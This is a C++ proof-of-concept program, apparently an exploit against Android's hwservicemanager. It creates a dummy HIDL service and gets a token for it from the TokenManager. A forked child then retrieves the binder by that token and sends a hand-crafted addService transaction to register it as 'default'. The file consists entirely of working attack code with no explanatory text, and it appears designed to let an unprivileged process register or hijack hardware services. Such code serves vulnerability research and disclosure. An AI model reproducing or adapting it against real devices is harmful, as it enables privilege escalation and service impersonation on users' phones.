#define LOG_TAG "HwService"
#include <android-base/logging.h>
#include <set>
#include <string>
#include <iostream>
#include <string>
#include <android-base/macros.h>
#include <android/hidl/manager/1.0/IServiceManager.h>
#include <android/hidl/base/1.0/BpHwBase.h>
#include <utils/StrongPointer.h>
#include <hwbinder/IPCThreadState.h>
#include <hidl/ServiceManagement.h>
#include <android/log.h>

#include <unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <err.h> 
#include <errno.h>
#include <sys/mman.h>

#include "IDummyService.h"
#include "BnHwDummyService.h"

#define LOGTAG ("HwServicePoC")

using ::android::hidl::manager::V1_0::IServiceManager;

using namespace android;
using namespace android::hardware;
using namespace android::frameworks::dummyservice::V1_0;

int g_childPid;

sp<IBinder> find_hwservice(sp<IBinder> sm, const hidl_string& fqName, const hidl_string& instance) {

	Parcel data;
	Parcel reply;
	android:status_t err;
	Status status;

    size_t fqname_parent;
	size_t instance_parent;

	//Interface descriptor
    if ((err = data.writeInterfaceToken(IServiceManager::descriptor)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write interface token: %d\n", err);
		return nullptr;
	}

    if ((err = data.writeBuffer(&fqName, sizeof(fqName), &fqname_parent)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write fqname: %d\n", err);
		return nullptr;
	}
    if ((err = writeEmbeddedToParcel(fqName, &data, fqname_parent, 0)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write embedded fqname: %d\n", err);
		return nullptr;
	}

    if ((err = data.writeBuffer(&instance, sizeof(instance), &instance_parent)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write instance: %d\n", err);
		return nullptr;
	}
    if ((err = writeEmbeddedToParcel(instance, &data, instance_parent, 0)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write embedded instance: %d\n", err);
		return nullptr;
	}

    if ((err = sm->transact(1, data, &reply)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to send transaction: %d\n", err);
		return nullptr;
	}

    if ((err = readFromParcel(&status, reply)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to read status: %d\n", err);
		return nullptr;
	}

    if (!status.isOk()) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Bad status: %d\n", status.transactionError());
		return nullptr;
	}

    sp<IBinder> result;
	if ((err = reply.readNullableStrongBinder(&result)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to read service binder: %d\n", err);
		return nullptr;
	}

	return result;
}

int add_hwservice(sp<IBinder> sm, const hidl_string& name, sp<IBinder> service) {

	Parcel data;
	Parcel reply;
	android::status_t err;
	Status status;

    size_t name_parent;

	//Interface descriptor
    if ((err = data.writeInterfaceToken(IServiceManager::descriptor)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write interface token: %d\n", err);
		return err;
	}

    if ((err = data.writeBuffer(&name, sizeof(name), &name_parent)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write name: %d\n", err);
		return err;
	}
    if ((err = writeEmbeddedToParcel(name, &data, name_parent, 0)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write embedded name: %d\n", err);
		return err;
	}
	if ((err = data.writeStrongBinder(service)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write service binder: %d\n", err);
		return err;
	}

//    if ((err = sm->transact(2, data, &reply, IBinder::FLAG_ONEWAY)) != android::OK) {
    if ((err = sm->transact(2, data, &reply)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to send transaction: %d\n", err);
		return err;
	}

    if ((err = readFromParcel(&status, reply)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to read status: %d\n", err);
		return err;
	}

    if (!status.isOk()) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Bad status: %d\n", status.transactionError());
		return err;
	}

    bool success;
	if ((err = reply.readBool(&success)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to read success flag: %d\n", err);
		return err;
	}

	if (success)
		return 0;
	return -EPERM;
}

const hidl_vec<uint8_t>* create_token(sp<IBinder> tm, sp<IBinder> service) {

	Parcel data;
	Parcel reply;
	android::status_t err;
	Status status;
    const hidl_vec<uint8_t>* token;
	size_t token_parent, token_child;

	//Interface descriptor
    if ((err = data.writeInterfaceToken("android.hidl.token@1.0::ITokenManager")) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write interface token: %d\n", err);
		return nullptr;
	}

	if ((err = data.writeStrongBinder(service)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write service binder: %d\n", err);
		return nullptr;
	}

    if ((err = tm->transact(1, data, &reply)) != android::OK) { //createToken
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to send transaction: %d\n", err);
		return nullptr;
	}
    
    if ((err = readFromParcel(&status, reply)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to read status: %d\n", err);
		return nullptr;
	}

    if (!status.isOk()) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Bad status: %d\n", status.transactionError());
		return nullptr;
	}

    if ((err = reply.readBuffer(sizeof(*token), &token_parent, reinterpret_cast<const void **>(&token))) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to read token: %d\n", err);
		return nullptr;
	}

    if ((err = readEmbeddedFromParcel(const_cast<hidl_vec<uint8_t> &>(*token), reply, token_parent, 0, &token_child)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to read embedded: %d\n", err);
		return nullptr;
	}

	return token;
}

sp<IBinder> get_by_token(sp<IBinder> tm, const hidl_vec<uint8_t>* token) {

	Parcel data;
	Parcel reply;
	android::status_t err;
	Status status;
	size_t token_parent, token_child;

	//Interface descriptor
    if ((err = data.writeInterfaceToken("android.hidl.token@1.0::ITokenManager")) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write interface token: %d\n", err);
		return nullptr;
	}
    if ((err = data.writeBuffer(token, sizeof(*token), &token_parent)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write token: %d\n", err);
		return nullptr;
	}
	if ((err = writeEmbeddedToParcel(*token, &data, token_parent, 0, &token_child)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to write embedded: %d\n", err);
		return nullptr;
	}

    if ((err = tm->transact(3, data, &reply)) != android::OK) { //get
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to send transaction: %d\n", err);
		return nullptr;
	}
    
    if ((err = readFromParcel(&status, reply)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to read status: %d\n", err);
		return nullptr;
	}

    if (!status.isOk()) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Bad status: %d\n", status.transactionError());
		return nullptr;
	}

    sp<IBinder> result;
	if ((err = reply.readNullableStrongBinder(&result)) != android::OK) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Failed to read service binder: %d\n", err);
		return nullptr;
	}

	return result;
}

int main_flow(int argc, char** argv) {

	//Finding the hwservicemanager
	sp<IBinder> serviceManager = ProcessState::self()->getContextObject(NULL);
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "pid=%d\n", getpid());
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "service manager: %p\n", serviceManager.get());
	
	//Creating a new dummy service
	sp<IDummyService> svc = new IDummyService();
	sp<IBinder> svcBinder = new BnHwDummyService(svc);

	//Registering our service with the TokenManager, receiving a new token
	hidl_string fqname("android.hidl.token@1.0::ITokenManager");
	hidl_string instance("default");
	sp<IBinder> tokenManager = find_hwservice(serviceManager, fqname, instance);
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "token manager: %p\n", tokenManager.get());

	//Getting the token for our binder
	const hidl_vec<uint8_t>* token;
	char tokenbuf[256];
	memset(tokenbuf, 0, sizeof(tokenbuf));
	token = create_token(tokenManager, svcBinder); 
	char* p = tokenbuf;
	for (size_t i=0; i<token->size(); i++)
		p += sprintf(p, "%02X", (*token)[i]);
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "TOKEN: %s\n", tokenbuf);
	
	//Creating a child to send the crafted add request
	int pid = fork();
	g_childPid = pid;
	if (pid < 0) {
		perror("Failed to fork");
		return -errno;
	}
	if (pid == 0) {
		//Execute the child
		execl(argv[0], argv[0], tokenbuf, nullptr);
	}

	//Starting to loop, waiting for requests
	IPCThreadState::self()->joinThreadPool();	

	return 0;
}

int child_flow(int, char** argv) {

	//Converting the token to a hidl_vec
	char* token_str = argv[1];
	hidl_vec<uint8_t>* token = new hidl_vec<uint8_t>();
	token->resize(strlen(token_str)/2);
	for (size_t i=0; i<token->size(); i++) {
		char s[3];
		unsigned b;
		memcpy(s, token_str+i*2, 2); s[2] = '\0';
		sscanf(s, "%02X", &b);
		(*token)[i] = (uint8_t)b;
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "%02X ", b);
	}
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "\n");

	//Finding the hwservicemanager
	sp<IBinder> serviceManager = ProcessState::self()->getContextObject(NULL);
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "pid=%d\n", getpid());
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "service manager: %p\n", serviceManager.get());
	
	//Fetching the TokenManager
	hidl_string fqname("android.hidl.token@1.0::ITokenManager");
	hidl_string instance("default");
	sp<IBinder> tokenManager = find_hwservice(serviceManager, fqname, instance);
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "token manager: %p\n", tokenManager.get());

	//Getting the binder corresponding to our token
	sp<IBinder> svc = get_by_token(tokenManager, token); 
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "token manager returned binder: %p\n", svc.get());

	//Sending an add service transaction
    hidl_string regname("default");
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Registering service...\n");
	int res = add_hwservice(serviceManager, regname, svc);
	__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "Sent add service transaction!\n");
	

	return 0;
}

int main(int argc, char** argv) {

	if (argc > 2) {
		__android_log_print(ANDROID_LOG_ERROR, LOGTAG, "USAGE: %s [optional: token]\n", argv[0]);
		return 0;
	}

	if (argc == 1)	
		return main_flow(argc, argv);
	else
		return child_flow(argc, argv);
}
